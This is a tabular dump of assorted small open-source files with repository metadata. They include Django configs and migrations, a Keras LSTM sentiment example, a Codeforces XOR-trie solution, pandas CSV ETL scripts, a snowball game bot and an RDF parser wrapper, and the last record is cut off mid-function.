blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
87d25e6b41c0eb727cfc908b91e9860fdcc17135 | d5087da467f07bc88579955a8ce9454cba8a3703 | /gestionusuarios/apps.py | d6ce7ba72cb30b0ef1374db560924a53ea6d416b | [] | no_license | RobJVE/Gestion-TrabajosdeGrado | 99744fcc9542d6c53748acbd79f508b3a8bfc122 | e929d6bca4d48570b5eaaf773c60eb511197a769 | refs/heads/master | 2020-11-28T16:17:01.318021 | 2020-01-08T17:19:54 | 2020-01-08T17:19:54 | 229,865,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from django.apps import AppConfig
# Django application config for the "gestionusuarios" (user management) app.
class GestionusuariosConfig(AppConfig):
    # Dotted label Django's app registry uses to identify this application.
    name = 'gestionusuarios'
| [
"robertojve12@gmail.com"
] | robertojve12@gmail.com |
eaeb032aefcca3f6234961954e3d3943a85cbe8b | 51e354e58f991d264bb6c3bf1c9277b16c332254 | /Boletín1/Ejercicio22.py | e7b7e0a84cea0bf3e996b921769e4eeb95dd8179 | [] | no_license | matey97/Programacion | 93ec50e26a136de0d53f4b847e92e703ee2a8296 | 929993978057c4c2e86469d11349ecd1fb45ae28 | refs/heads/master | 2021-07-21T16:00:17.170393 | 2017-10-31T18:32:46 | 2017-10-31T18:32:46 | 109,030,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | '''
Created on 1 de oct. de 2015
@author: al341802
'''
from math import pi
# Read the circle radius from the user (raises ValueError on non-numeric input).
radio=float(input("Introduce el radio:"))
# Area of the circle: pi * r**2.
area=pi*radio**2
# Circumference: 2 * pi * r.  NOTE(review): `long` shadows a builtin name.
long=2*pi*radio
print("El area es:{0:.2f}".format(area))
print("La longitud de la circunferencia es:{0:.2f}".format(long)) | [
"al341802@uji.es"
] | al341802@uji.es |
42a8dac1509c16a1f9ee4746a23db2e89449bf64 | 11d265eba2ced9de43c339e4014c779b521320cd | /accounts/migrations/0004_auto_20200423_2253.py | eccb31bc3dd7e0a1872e9574429fc5cdc2edd129 | [] | no_license | Sloshpit/budget_old | d9271de625cd7e3aa66ccbec501b005e50cd2812 | a5603996b026542adb3bc8c578c03bcb843bea01 | refs/heads/master | 2022-04-23T08:42:43.377827 | 2020-04-25T14:40:39 | 2020-04-25T14:40:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # Generated by Django 3.0.5 on 2020-04-24 02:53
from django.db import migrations
class Migration(migrations.Migration):
    """Rename `transaction_date` to `balance_date` and drop the obsolete
    per-transaction fields from the `account` model."""
    dependencies = [
        ('accounts', '0003_auto_20200423_2251'),
    ]
    operations = [
        # Keep the column data: rename rather than drop+add.
        migrations.RenameField(
            model_name='account',
            old_name='transaction_date',
            new_name='balance_date',
        ),
        migrations.RemoveField(
            model_name='account',
            name='transaction',
        ),
        migrations.RemoveField(
            model_name='account',
            name='transaction_amount',
        ),
    ]
| [
"neel.maheshwari@gmail.com"
] | neel.maheshwari@gmail.com |
2ac308de7ea56c3e49a6bf3d403f763954382164 | d8788a352e84b6184fc65e499fd2e198855b4ab1 | /05_RNN/rnn_imdb.py | b63b931774d18de45b4d4797ce04b1ad3e94ac39 | [] | no_license | yjkim0083/3min_keras | 7cb5c883d2b337beb5dc54ba235fac37bc206640 | 46e192cf37a3407e69b6b81c10cb2b1dff35586d | refs/heads/master | 2020-05-17T00:21:12.795091 | 2019-04-26T09:30:32 | 2019-04-26T09:30:32 | 183,394,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | # import library
from __future__ import print_function
from keras.preprocessing import sequence
from keras.datasets import imdb
from keras import layers, models
# 데이터 준비
# 데이터 준비
class Data:
    """Load the IMDB sentiment dataset and pad/truncate reviews to `maxlen`.

    max_features: vocabulary size kept by `imdb.load_data`.
    maxlen: fixed sequence length fed to the network.
    """
    def __init__(self, max_features=20000, maxlen=80):
        (x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
        # Pad (or cut) every review to exactly `maxlen` token ids.
        x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
        x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
        self.x_train, self.y_train = x_train, y_train
        self.x_test, self.y_test = x_test, y_test
# modeling
class RNN_LSTM(models.Model):
def __init__(self, max_features, maxlen):
x = layers.Input((maxlen,))
h = layers.Embedding(max_features, 128)(x)
h = layers.LSTM(128, dropout=0.2, recurrent_dropout=0.2)(h)
y = layers.Dense(1, activation="sigmoid")(h)
super().__init__(x, y)
# try using different optimizers and differend optimizer configs
self.compile(loss="binary_crossentropy", optimizer="adam", metrics=["accuracy"])
# 학습 및 평가
class Machine:
    """Wires the Data loader and the RNN_LSTM model; runs train + evaluate."""
    def __init__(self, max_features=20000, maxlen=80):
        self.data = Data(max_features, maxlen)
        self.model = RNN_LSTM(max_features, maxlen)
    def run(self, epochs=3, batch_size=32):
        data = self.data
        model = self.model
        print("Training stage")
        print("============================")
        # Validate on the test split each epoch (no separate dev split).
        model.fit(data.x_train, data.y_train,
                  batch_size=batch_size,
                  epochs=epochs,
                  validation_data=(data.x_test, data.y_test))
        score, acc = model.evaluate(data.x_test, data.y_test, batch_size=batch_size)
        print("Test performance: accuracy={0}, loss={1}".format(acc, score))
def main():
    # Entry point: build the train/evaluate wrapper with defaults and run it.
    m = Machine()
    m.run()
if __name__ == "__main__":
    main() | [
"yjkim0083@gmail.com"
] | yjkim0083@gmail.com |
4c78ff7b8d99fa7a2c0507d61ea3beb4dacca5b9 | 14828d39e62daa1805fcad2046ee4f7059e89f89 | /build/catkin_generated/order_packages.py | 19733f48c19b3444ef2949ad6d90006b2b27fc26 | [] | no_license | haosen9527/TF_demo | 699afa4c2c2053b6816f79dcd35e7857d9ea2cef | 4ce2c632d8eefc2abd87b7af2a1582982f68f4d2 | refs/heads/master | 2020-03-21T07:53:31.813816 | 2018-06-22T13:35:06 | 2018-06-22T13:35:06 | 138,306,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # generated from catkin/cmake/template/order_packages.context.py.in
# Auto-generated catkin build context; values are baked in at configure time.
source_root_dir = "/home/micros/catkin_new/src"
# Empty template values mean "no whitelist/blacklist": both end up as [].
whitelisted_packages = "".split(';') if "" != "" else []
blacklisted_packages = "".split(';') if "" != "" else []
# Chained catkin workspaces this build overlays (devel space + ROS install).
underlay_workspaces = "/home/micros/catkin_new/devel;/opt/ros/kinetic".split(';') if "/home/micros/catkin_new/devel;/opt/ros/kinetic" != "" else []
| [
"ljhao1994@163..com"
] | ljhao1994@163..com |
18dbf87af9420c5a2ca503743e7f290aaeb054b1 | 8f50df9241833fa477687a02448b7f3f929f5d93 | /codeforces/706d/solution.py | b06518e0a9ac9aea9eb4f5b0457a67a89f93b811 | [] | no_license | tjwudi/problem-solving | 7004453d037915892348308a16670eb499577cd5 | d29ba6bce035c9cb75bf2bc4e7b84c062ecda615 | refs/heads/master | 2020-04-05T18:29:32.513172 | 2016-08-31T12:24:49 | 2016-08-31T12:24:49 | 65,372,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | import sys
import math
def get_bit(num, position, wide=1):
    """Extract ``wide`` bits of ``num`` whose highest bit is at the
    1-indexed ``position`` (counting from the least significant bit).

    get_bit(0b00001, 1) == 1
    get_bit(0b00010, 2) == 1
    """
    mask = (1 << wide) - 1
    shifted = num >> (position - wide)
    return shifted & mask
class DNode(object):
    """Node of the digit trie: 2**bits_group child slots plus a reference
    count of how many stored numbers pass through this node."""

    def __init__(self, count=0, bits_group=1):
        fanout = 1 << bits_group
        self.childs = [None] * fanout
        self.count = count
        self.num = None

    @property
    def valid(self):
        """A node stays alive while at least one number references it."""
        return self.count > 0
class DTree(object):
    """Trie over 30-bit integers consumed 5 bits per level (6 levels), with
    per-node reference counts so numbers can be inserted and removed.
    `find_max(mask)` returns the maximum of (stored_number XOR mask)."""
    def __init__(self):
        self.DIGIT_LEN = 30    # total bits indexed per number
        self.BITS_GROUP = 5    # bits consumed per trie level
        self.root = DNode(bits_group=self.BITS_GROUP)
    def num_exists(self, num):
        # Walk from the most significant group down; a missing or
        # zero-count child means the number is not (any longer) stored.
        current_node = self.root
        for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
            digit = get_bit(num, i, self.BITS_GROUP)
            if current_node.childs[digit] is None or not current_node.childs[digit].valid:
                return False
            current_node = current_node.childs[digit]
        return True
    def insert(self, num):
        # Create missing nodes along the path and bump every ref count.
        current_node = self.root
        current_node.count += 1
        for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
            digit = get_bit(num, i, self.BITS_GROUP)
            if current_node.childs[digit] is None:
                current_node.childs[digit] = DNode(bits_group=self.BITS_GROUP)
            current_node = current_node.childs[digit]
            current_node.count += 1
    def remove(self, num):
        # Decrement ref counts along the path; nodes are never freed, they
        # just become invalid (count == 0).  Assumes `num` was inserted.
        current_node = self.root
        current_node.count -= 1
        for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
            digit = get_bit(num, i, self.BITS_GROUP)
            next_node = current_node.childs[digit]
            next_node.count -= 1
            current_node = next_node
    def find_max(self, mask):
        # Greedy per-level maximisation: at each level try the largest
        # possible XOR result (masked_trial) first; the stored digit that
        # would produce it is masked_trial ^ digit_mask.  `num` accumulates
        # the XOR result itself, not the stored number.
        current_node = self.root
        num = 0
        for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
            digit_mask = get_bit(mask, i, self.BITS_GROUP)
            for masked_trial in xrange((1 << self.BITS_GROUP) - 1, -1, -1):
                trial = masked_trial ^ digit_mask
                if (current_node.childs[trial] is not None and
                    current_node.childs[trial].valid):
                    num = (num << self.BITS_GROUP) + masked_trial
                    current_node = current_node.childs[trial]
                    break
        return num
class Solution(object):
    """Reads '+ x', '- x', '? x' operations from stdin (Codeforces 706D)
    and prints the answer of each '?' query via the XOR trie."""
    def run(self):
        tree = DTree()
        # The multiset always contains 0, per the problem statement.
        tree.insert(0)
        n = int(raw_input())
        for _ in xrange(n):
            op, num = raw_input().split()
            num = int(num)
            if op == '+':
                tree.insert(num)
            if op == '-':
                tree.remove(num)
            if op == '?':
                # Maximum of (stored XOR num) over the multiset.
                print(tree.find_max(num))
class Test(object):
    """Ad-hoc self-checks for DTree, run via the `test` CLI argument."""
    def run_test(self):
        self.test_insert()
        self.test_remove()
        self.test_find_max()
    def test_insert(self):
        tree = DTree()
        tree.insert(10)
        tree.insert(9)
        assert tree.num_exists(10)
        assert tree.num_exists(9)
        print('test_insert passed')
    def test_remove(self):
        tree = DTree()
        assert not tree.num_exists(10)
        tree.insert(10)
        assert tree.num_exists(10)
        tree.remove(10)
        assert not tree.num_exists(10)
        print('test_remove passed')
    def test_find_max(self):
        tree = DTree()
        tree.insert(3)
        tree.insert(0)
        # 3 XOR 3 == 0 but 0 XOR 3 == 3, so the maximum is 3.
        assert tree.find_max(3) == 3
        print('test_find_max passed')
print('test_find_max passed')
if __name__ == '__main__':
    # CLI modes: `profile` runs the solver under cProfile, `test` runs the
    # DTree self-checks, anything else solves the actual problem from stdin.
    if len(sys.argv) == 2 and sys.argv[1] == 'profile':
        import cProfile
        cProfile.run('Solution().run()')
    elif len(sys.argv) == 2 and sys.argv[1] == 'test':
        Test().run_test()
    else:
        Solution().run()
| [
"webmaster@leapoahead.com"
] | webmaster@leapoahead.com |
c663247f79902d830119db43c67ab692f260485a | 46a130d64358681dea6003f2c5555c98bfd69e11 | /load_to_itop/scripts/trans_to_dump.py | dacd6c9aea0802c3c07f30eb1f61fffc8c9d170b | [] | no_license | yyztc/itopV2 | 5220ba2f3419dcfc3b3d5d0d756ea9cd232f6c47 | 855d8c6d61cbe1feea646f9b4ec7825d73d7ecc0 | refs/heads/master | 2020-11-28T08:47:24.809754 | 2018-02-09T01:34:53 | 2018-02-09T01:34:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,286 | py | #encoding=utf8
import shutil
import csv
import os
import numpy as np
import pandas as pd
from pprint import pprint
from config import server_src_csv, vm_src_csv, server_static_csv, network_csv, storage_csv, sync_ds_csv, brand_csv, model_csv, osfamily_csv, osversion_csv, networktype_csv, physicalserver_csv, virtualmachine_csv, hypervisor_csv, nonesx_server_csv
from config import DUMPDIR,STATICDIR
def format_osfamily_name(osversion_name):
    """Map a raw OS version string onto a coarse OS family label.

    Matching is case-insensitive substring search; unknown strings fall
    back to 'OTHERS'.
    """
    upper_name = osversion_name.upper()
    # Order matters: the first matching token wins, mirroring the
    # original if/elif cascade ('RED' is checked before 'CENTOS').
    for token, family in (('WINDOW', 'WINDOWS'),
                          ('RED', 'REDHAT'),
                          ('CENTOS', 'CENTOS'),
                          ('ESX', 'ESX')):
        if token in upper_name:
            return family
    return 'OTHERS'
def format_server(server_df,csvfile):
    """Normalise the raw vCenter server export into the PhysicalServer CSV.

    NOTE(review): relies on the module-level globals `server_static_df` and
    `nonesx_server_df` being loaded by the __main__ block before this runs.
    """
    # rename column name
    columns = {
        'vc_model_name':'model_id',
        'vc_cpu_speedGHz':'cpu_speed',
        'vc_os_version':'osversion_id',
        'vc_memory_size':'memory',
        'vc_cpu_num':'cpu_num',
        'vc_power_status':'power_status',
        'vc_env':'env_id',
        'vc_fiber_hba_num':'fiber_card_num',
        'vc_brand_name':'brand_id',
        'vc_cpu_type':'cpu_type',
        'vc_name':'name',
        'vc_ip':'ip',
        'vc_cpu_core':'cpu_core',
        'vc_fiber_hba_device':'fiber_card_model'
    }
    # Rename, add fixed org/criticality/status columns, and keep only the
    # columns the target CSV expects.
    server_df = server_df.rename(columns=columns).assign(org_id=lambda x:'Cargosmart').assign(business_criticity=lambda x:'high').assign(status='production').assign(server_type='ESX')[['model_id','cpu_speed','osversion_id','memory','cpu_num','power_status','env_id','fiber_card_num','brand_id','cpu_type','name','org_id','business_criticity','cpu_core','ip','fiber_card_model','status','server_type']]
    # add osfmaily
    server_df['osfamily_id'] = server_df['osversion_id'].map(lambda x:format_osfamily_name(x))
    # join with static data
    server_df['join_name']=server_df['name'].map(lambda x:x.lower().split('.cargosmart.com')[0])
    df = pd.merge(server_df, server_static_df, left_on='join_name',right_on='server_name').drop(['join_name','server_name'], axis=1)
    # union nonesx server
    df = pd.concat([df,nonesx_server_df])
    # format name without domain
    df['name'] = df['name'].map(lambda x:x.split('.')[0].lower())
    # add primary key
    df.index=[x for x in range(len(df))]
    df['primary_key'] = df.index+1
    df.set_index('primary_key',inplace=True)
    df.to_csv(csvfile)
    return df
def format_vm(vm_df,csvfile):
    """Normalise the raw vCenter VM export into the VirtualMachine CSV."""
    columns = {
        'vc_name': 'name',
        'vc_memory_size': 'ram',
        'vc_cpu_num': 'cpu',
        'vc_ip': 'ip',
        'vc_server_name': 'virtualhost_id',
        'vc_env': 'env_id',
        'vc_vm_os_version': 'osversion_id',
        'vc_power_status': 'powerState',
    }
    # Rename, add fixed org/criticality columns, keep target columns only.
    vm_df = vm_df.rename(columns=columns).assign(org_id=lambda x:'Cargosmart').assign(business_criticity=lambda x:'high')[['name','ram','cpu','ip','virtualhost_id','env_id','osversion_id','powerState','org_id','business_criticity']]
    # add osfmaily
    vm_df['osfamily_id'] = vm_df['osversion_id'].map(lambda x:format_osfamily_name(x))
    # format name without domain
    vm_df['name']=vm_df['name'].map(lambda x:x.split('.')[0].lower())
    vm_df['virtualhost_id']=vm_df['virtualhost_id'].map(lambda x:x.split('.')[0].lower())
    # add primary key
    vm_df.index=[x for x in range(len(vm_df))]
    vm_df['primary_key'] = vm_df.index+1
    vm_df.set_index('primary_key',inplace=True)
    vm_df.to_csv(csvfile)
    return vm_df
def gen_brand_csv(server_df, network_df, csvfile):
    """Build the brand dimension CSV from server, network and storage brands.

    The first whitespace token of the server model string is taken as its
    brand.  NOTE(review): still reads the module-level global `storage_df`
    (loaded in the __main__ block), unlike the explicit parameters.
    """
    server_brand = server_df['model_id'].map(lambda x: x.split()[0]).drop_duplicates().rename('name')
    network_brand = network_df.brand_id.drop_duplicates().rename('name')
    storage_brand = storage_df.brand_id.drop_duplicates().rename('name')
    # pd.concat replaces Series.append, which was removed in pandas 2.0
    # (this module already uses pd.concat in format_server).
    merge_brand = pd.concat([server_brand, network_brand, storage_brand]).drop_duplicates()
    df = pd.DataFrame(merge_brand).reset_index(drop=True)
    # Synthetic 1-based primary key.
    df.index = [x for x in range(len(df))]
    df['primary_key'] = df.index + 1
    df.set_index('primary_key', inplace=True)
    df.to_csv(csvfile)
    return df
def gen_model_csv(server_df, network_df, csvfile):
    """Build the model dimension CSV: one row per distinct (model, CI type).

    NOTE(review): also depends on the module-level global `storage_df`.
    """
    server_model = server_df.assign(type=lambda x: 'Server').drop(['name'], axis=1).rename(columns={'model_id': 'name'})[['name', 'type', 'brand_id']].drop_duplicates()
    network_model = network_df.assign(type=lambda x: 'NetworkDevice').drop(['name'], axis=1).rename(columns={'model_id': 'name'})[['name', 'type', 'brand_id']].drop_duplicates()
    storage_model = storage_df.assign(type=lambda x: 'StorageSystem').drop(['name'], axis=1).rename(columns={'model_id': 'name'})[['name', 'type', 'brand_id']].drop_duplicates()
    # pd.concat replaces DataFrame.append, which was removed in pandas 2.0.
    merge_model = pd.concat([server_model, network_model, storage_model])
    df = pd.DataFrame(merge_model)
    # Synthetic 1-based primary key.
    df.index = [x for x in range(len(df))]
    df['primary_key'] = df.index + 1
    df.set_index('primary_key', inplace=True)
    df.to_csv(csvfile)
    return df
def gen_osfamily_csv(server_df, vm_df, csvfile):
    """Build the OS-family dimension CSV from server and VM family columns.

    Blank and 'nan' family names are filtered out after stripping.
    """
    server_osfamily = server_df['osfamily_id'].drop_duplicates().rename('name')
    vm_osfamily = vm_df['osfamily_id'].drop_duplicates().rename('name')
    # pd.concat replaces Series.append, which was removed in pandas 2.0.
    merge_osfamily = pd.concat([server_osfamily, vm_osfamily])
    df = pd.DataFrame(merge_osfamily)
    df.index = [x for x in range(len(df))]
    df['name'] = df['name'].map(lambda x: str(x).strip())
    # Drop empty names and stringified NaN values.
    df = df.loc[df['name'] != ''].loc[df['name'] != 'nan']
    # 1-based primary key derived from the pre-filter positional index.
    df['primary_key'] = df.index + 1
    df.set_index('primary_key', inplace=True)
    df.to_csv(csvfile)
    return df
def gen_osversion_csv(server_df, vm_df, csvfile):
    """Build the OS-version dimension CSV (version name + family) from the
    server and VM frames; rows with a null version name are dropped."""
    server_osversion = server_df.drop(['name'], axis=1).rename(columns={'osversion_id': 'name'})[['name', 'osfamily_id']].drop_duplicates()
    vm_osversion = vm_df.drop(['name'], axis=1).rename(columns={'osversion_id': 'name'})[['name', 'osfamily_id']].drop_duplicates()
    # pd.concat replaces DataFrame.append, which was removed in pandas 2.0.
    merge_osversion = pd.concat([server_osversion, vm_osversion])
    merge_osversion = merge_osversion.loc[merge_osversion['name'].notnull()]
    df = pd.DataFrame(merge_osversion)
    # Synthetic 1-based primary key.
    df.index = [x for x in range(len(df))]
    df['primary_key'] = df.index + 1
    df.set_index('primary_key', inplace=True)
    df.to_csv(csvfile)
    return df
def gen_networktype_csv(network_df, csvfile):
    """Dump the distinct network-device types to CSV with a 1-based
    `primary_key` index and return the resulting frame."""
    unique_types = network_df.networkdevicetype_id.drop_duplicates().rename('name')
    df = pd.DataFrame(unique_types)
    df.index = [x for x in range(len(df))]
    df['primary_key'] = df.index + 1
    df.set_index('primary_key', inplace=True)
    df.to_csv(csvfile)
    return df
def gen_hypervisor_csv(server_df, csvfile):
    """Project the hypervisor columns out of the server frame; `server_id`
    duplicates `name` to satisfy the iTop import format."""
    wanted_cols = ['name', 'org_id', 'env_id', 'business_criticity', 'status']
    hypervisors = server_df[wanted_cols].assign(server_id=lambda frame: frame['name'])
    hypervisors.to_csv(csvfile)
    return hypervisors
if __name__ == '__main__':
    # Load the raw exports defined in config.py.
    server_src_df = pd.DataFrame(pd.read_csv(server_src_csv))
    vm_src_df = pd.DataFrame(pd.read_csv(vm_src_csv))
    server_static_df = pd.DataFrame(pd.read_csv(server_static_csv))
    nonesx_server_df = pd.DataFrame(pd.read_csv(nonesx_server_csv))
    network_df = pd.DataFrame(pd.read_csv(network_csv))
    storage_df = pd.DataFrame(pd.read_csv(storage_csv))
    # format data
    server_df = format_server(server_src_df,physicalserver_csv)
    vm_df = format_vm(vm_src_df,virtualmachine_csv)
    # gen csv (dimension/output files consumed by the iTop loader)
    gen_brand_csv(server_df,network_df,brand_csv)
    gen_model_csv(server_df,network_df,model_csv)
    gen_osfamily_csv(server_df,vm_df,osfamily_csv)
    gen_osversion_csv(server_df,vm_df,osversion_csv)
    gen_networktype_csv(network_df,networktype_csv)
    gen_hypervisor_csv(server_df,hypervisor_csv)
    # copy static csv file to dump dir, replacing stale copies
    static_files = os.listdir(STATICDIR)
    for filename in static_files:
        src = os.path.join(STATICDIR,filename)
        dst = os.path.join(DUMPDIR,filename)
        if os.path.exists(dst):
            os.remove(dst)
        shutil.copyfile(src,dst)
| [
"root@devops.localdomain"
] | root@devops.localdomain |
7aeb59e68007f90a70eb8d4027a76867e6acdc54 | df5c8186fa526be8fc6c5295a82d673458b668c3 | /Unit 7/Ai bot/test bots/RandomRoy.py | 3cfc23afb5de89c47a4847168a94abdc056af627 | [
"MIT"
] | permissive | KevinBoxuGao/ICS3UI | 296a304e048080d3a6089a788eb3b74c099d5f1e | 2091a7c0276b888dd88f2063e6acd6e7ff7fb6fa | refs/heads/master | 2020-04-23T03:32:49.424600 | 2019-06-18T21:20:36 | 2019-06-18T21:20:36 | 170,881,750 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,320 | py | from random import *
#STRATEGY: JUST PICK RANDOMLY, MAKING SURE THAT I DON'T LOSE BY CHEATING
def getMove(myScore, mySnowballs, myDucksUsed, myMovesSoFar,
            oppScore, oppSnowballs, oppDucksUsed, oppMovesSoFar):
    """Pick a uniformly random *legal* move for the snowball game.

    Legality: THROW needs at least one snowball, RELOAD needs fewer than
    10 snowballs, and DUCK is only available while fewer than 5 ducks
    have been used.
    """
    can_duck = myDucksUsed < 5
    if mySnowballs == 0:
        # Out of ammo: reload is forced unless a duck is still available.
        return choice(["DUCK", "RELOAD"]) if can_duck else "RELOAD"
    if mySnowballs == 10:
        # At the snowball cap: reloading is illegal.
        return choice(["DUCK", "THROW"]) if can_duck else "THROW"
    # Mid-range ammo: every move is legal except possibly DUCK.
    if can_duck:
        return choice(["THROW", "DUCK", "RELOAD"])
    return choice(["THROW", "RELOAD"])
| [
"kevingao2003@gmail.com"
] | kevingao2003@gmail.com |
924d20afd9dad0f7b5bf8a84d7d57e1cfef8e356 | c2d8493fd9aa1baccff2e70658b1da5e350a3d33 | /prj_auth/models.py | 16a77cc9fdbb59e254da3e5abcaa457008072417 | [] | no_license | tufedtm/dj_aut | 6c5fe1ea148fb2a942dfa815bc5b16f7b7b833f5 | 0b8876263434f97191b0d5a423147ec662c004a4 | refs/heads/master | 2021-01-12T15:12:18.625147 | 2016-09-27T13:23:17 | 2016-09-27T13:23:17 | 69,359,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from django.contrib.auth.models import AbstractUser
# Custom user model extending Django's AbstractUser; currently only
# overrides the admin display names (verbose_name strings are Russian).
class MyUser(AbstractUser):
    class Meta:
        verbose_name = 'мой пользователь'
        verbose_name_plural = 'мои пользователи'
| [
"tufedtm@gmail.com"
] | tufedtm@gmail.com |
3c9e94802edf1b2bda9664db98775acda9edceef | d5b187cd25874c73fe18aa534ca6a4fa388b5464 | /python-fundamentals/week2/day4-data_structures_cont/Ans_part2_2.py | 15f15165c23a4a68daa4952cd7294248e9cf2c17 | [] | no_license | jwcrandall/galvanize | dec7618c5e5bb8af7340acad8e07f58b703b317f | e4f05c172a2e046f7ee3c151618ed1295717a0d4 | refs/heads/master | 2022-09-15T02:49:45.927678 | 2020-06-04T19:43:12 | 2020-06-04T19:43:12 | 269,430,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 870 | py | # Write a script that prompts the user for a state name.
search_state = input("Please enter a state name: ")
search_state = search_state.lower()
#It will then check that state name against the dictionary below to give back the capital of that state.
# However, you'll notice that the dictionary doesn't know the capitals for all the states.
# If the user inputs the name of a state that isn't in the dictionary, your script should
# print that the capital is unknown.
state_dictionary = {'Colorado': 'Denver', 'Alaska': 'Juneau', 'California': 'Sacramento',
'Georgia': 'Atlanta', 'Kansas': 'Topeka', 'Nebraska': 'Lincoln',
'Oregon': 'Salem', 'Texas': 'Austin', 'New York': 'Albany'}
if search_state in state_dictionary:
print(state_dictionary[search_state])
else:
print('{} capital unknown.'.format(search_state))
| [
"josephcrandall@me.com"
] | josephcrandall@me.com |
e3b72e06b1595b812d60964be50b5f7d6587a95a | 32a24714b7450eea329faa19b93475545d3ec7a9 | /app/rapper_wrapper.py | 5aa6a67c44fc380ead94e33d6d18a725247439b7 | [] | no_license | yum-yab/rapper-mod | b32fcf224d0cdd1e75f2f203381efa8a23a6fb69 | a63a2360056f862bceb3b465af274428321e1d1b | refs/heads/main | 2023-03-29T10:22:54.395656 | 2021-04-01T12:53:14 | 2021-04-01T12:53:14 | 353,626,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,433 | py | import os
import sys
import json
import subprocess
import re
# Patterns matching the diagnostic line formats rapper prints on stderr.
rapperErrorsRegex = re.compile(r"^rapper: Error.*$")
rapperWarningsRegex = re.compile(r"^rapper: Warning.*$")
rapperTriplesRegex = re.compile(r"rapper: Parsing returned (\d+) triples")


def returnRapperErrors(rapperLog):
    """Split a raw rapper stderr log into (error_lines, warning_lines)."""
    errorMatches, warningMatches = [], []
    for logLine in rapperLog.split("\n"):
        # Classify each line by the rapper prefix it carries, if any.
        if rapperErrorsRegex.match(logLine):
            errorMatches.append(logLine)
        elif rapperWarningsRegex.match(logLine):
            warningMatches.append(logLine)
    return errorMatches, warningMatches
def getTripleNumberFromRapperLog(rapperlog):
    """Return the triple count rapper reported in its log, or None if the
    'Parsing returned N triples' line is absent."""
    found = rapperTriplesRegex.search(rapperlog)
    return int(found.group(1)) if found is not None else None
def parse_rdf_from_string(
    rdf_string, base_uri, input_type=None, output_type="ntriples"
):
    """Run the external `rapper` RDF parser over `rdf_string`.

    Returns (converted_output, triple_count_or_None, error_lines,
    warning_lines).  With input_type=None rapper guesses the syntax (-g);
    otherwise the given syntax name is passed via -i.
    """
    if input_type == None:
        command = ["rapper", "-I", base_uri, "-g", "-", "-o", output_type]
    else:
        command = ["rapper", "-I", base_uri, "-i", input_type, "-", "-o", output_type]
    # The RDF payload is fed on stdin ("-" argument above); diagnostics
    # arrive on stderr, converted triples on stdout.
    process = subprocess.run(
        command,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        input=bytes(rdf_string, "utf-8"),
    )
    triples = getTripleNumberFromRapperLog(process.stderr.decode("utf-8"))
    errors, warnings = returnRapperErrors(process.stderr.decode("utf-8"))
    return process.stdout.decode("utf-8"), triples, errors, warnings
| [
"streitmatter@informatik.uni-leipzig.de"
] | streitmatter@informatik.uni-leipzig.de |
f71387df36af9f3c0cb4897aa762c93b0ccbdb5f | 3f60b999ea7bda83c9586f75f52463dc20337f24 | /sensitive_user_portrait/weibo_rank/Offline_task.py | de919db3a2449e8b9e35b521386aa9943040a4ae | [] | no_license | jianjian0dandan/sensitive_user_portrait | 629e49ce71db92b50634bac9c828811cdb5381e9 | cacc30267ebc0e621b1d48d4f1206277a0f48123 | refs/heads/master | 2021-01-20T23:18:07.138057 | 2016-05-22T12:09:40 | 2016-05-22T12:09:40 | 42,869,287 | 0 | 0 | null | 2015-09-21T13:55:12 | 2015-09-21T13:55:11 | null | UTF-8 | Python | false | false | 6,454 | py | #-*-coding: utf-8 -*-
import datetime
import json
import time as TIME
from elasticsearch import Elasticsearch
from time_utils import ts2datetime, datetime2ts, ts2date
from global_utils import es_user_portrait as es
# Elasticsearch index/type holding submitted keyword-rank tasks and results.
WEIBO_RANK_KEYWORD_TASK_INDEX = 'weibo_rank_keyword_task'
WEIBO_RANK_KEYWORD_TASK_TYPE = 'weibo_rank_task'
# Upper bound on hits fetched per listing query (2**10 == 1024).
MAX_ITEMS = 2 ** 10
def add_task(user_name, type="keyword", range="all", pre='flow_text_', during='1', start_time='2013-09-07', end_time='2013-09-07', keyword='hello,world', sort_norm='reposts_count', sort_scope='all_limit_keyword', time=1, number=100, isall=0):
    """Index a new weibo keyword-rank task document and return its task id.

    The id is '<user_name>-<submit_ts>'.  `keyword` is a comma-separated
    string; empty items are dropped.  NOTE: `type`/`range` shadow builtins
    but are kept for caller compatibility.  `isall` used to be read while
    never defined (a guaranteed NameError); it is now an explicit
    parameter -- confirm the proper default with consumers of that field.
    """
    time_now = int(TIME.time())
    task_id = user_name + "-" + str(time_now)
    # Keep only the non-empty keywords from the comma-separated input.
